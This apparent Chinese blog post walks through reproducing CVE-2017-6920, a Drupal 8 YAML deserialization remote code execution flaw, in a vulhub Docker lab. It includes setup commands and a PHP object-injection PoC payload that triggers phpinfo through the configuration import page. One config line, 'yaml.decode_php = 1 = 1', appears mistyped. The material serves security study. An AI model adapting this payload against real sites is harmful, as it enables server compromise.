标签：Core 容器 Drupal 6920 漏洞 代码执行 docker 序列化 2017

0x01漏洞概述

2017年6月21日，Drupal官方发布了一个编号为CVE-2017- 6920 的漏洞，影响为Critical。这是Drupal Core的YAML解析器处理不当所导致的一个远程代码执行漏洞，影响8.x的Drupal Core。

0x02影响版本

8.x的Drupal Core

0x03漏洞环境

1、启动漏洞环境

┌──(root㉿kali)-[~/vulhub/drupal/CVE-2017-6920]
└─# docker-compose up -d

2、访问漏洞环境

（1）环境启动后访问如下链接，将会看到drupal的安装页面。因为没有mysql环境，所以安装的时候可以选择sqlite数据库。其他配置均默认即可。

http://your-ip:8080/

（2）进入docker容器

查看docker容器ID：
docker ps -a

进入docker容器：
docker exec -it CONTAINER ID /bin/bash 

（3）安装yaml扩展

# 换镜像源，默认带vim编辑器，所以用cat换源，可以换成自己喜欢的源
cat > sources.list << EOF
deb http://mirrors.163.com/debian/ jessie main non-free contrib
deb http://mirrors.163.com/debian/ jessie-updates main non-free contrib
deb http://mirrors.163.com/debian/ jessie-backports main non-free contrib
deb-src http://mirrors.163.com/debian/ jessie main non-free contrib
deb-src http://mirrors.163.com/debian/ jessie-updates main non-free contrib
deb-src http://mirrors.163.com/debian/ jessie-backports main non-free contrib
deb http://mirrors.163.com/debian-security/ jessie/updates main non-free contrib
deb-src http://mirrors.163.com/debian-security/ jessie/updates main non-free contrib
EOF
# 安装依赖
apt update
apt-get -y install gcc make autoconf libc-dev pkg-config
apt-get -y install libyaml-dev
# 安装yaml扩展
pecl install yaml
docker-php-ext-enable yaml.so
# 启用 yaml.decode_php 否则无法复现成功
echo 'yaml.decode_php = 1 = 1'>>/usr/local/etc/php/conf.d/docker-php-ext-yaml.ini
# 退出容器
exit
# 重启容器，CONTAINER换成自己的容器ID
docker restart CONTAINER

3、复现完成后，删除漏洞环境

┌──(root㉿kali)-[~/vulhub/drupal/CVE-2017-6920]
└─# docker-compose down

0x04复现过程

1、登录管理员账户，访问如下地址：

http://your-ip:8080/admin/config/development/configuration/single/import

界面如下：

2、如图所示，Configuration type（配置类型）选择 Simple configuration（简单配置），Configuration name（配置名称）任意填写，Paste your configuration here（将配置粘贴到此处）中填写PoC如下：

!php/object "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\0GuzzleHttp\\Psr7\\FnStream\0methods\";a:1:{s:5:\"close\";s:7:\"phpinfo\";}s:9:\"_fn_close\";s:7:\"phpinfo\";}"

3、点击 Import（导入）后可以看到漏洞触发成功，弹出 phpinfo页面。

标签：Core,容器,Drupal,6920,漏洞,代码执行,docker,序列化,2017
来源： https://www.cnblogs.com/RichardYg/p/16349861.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。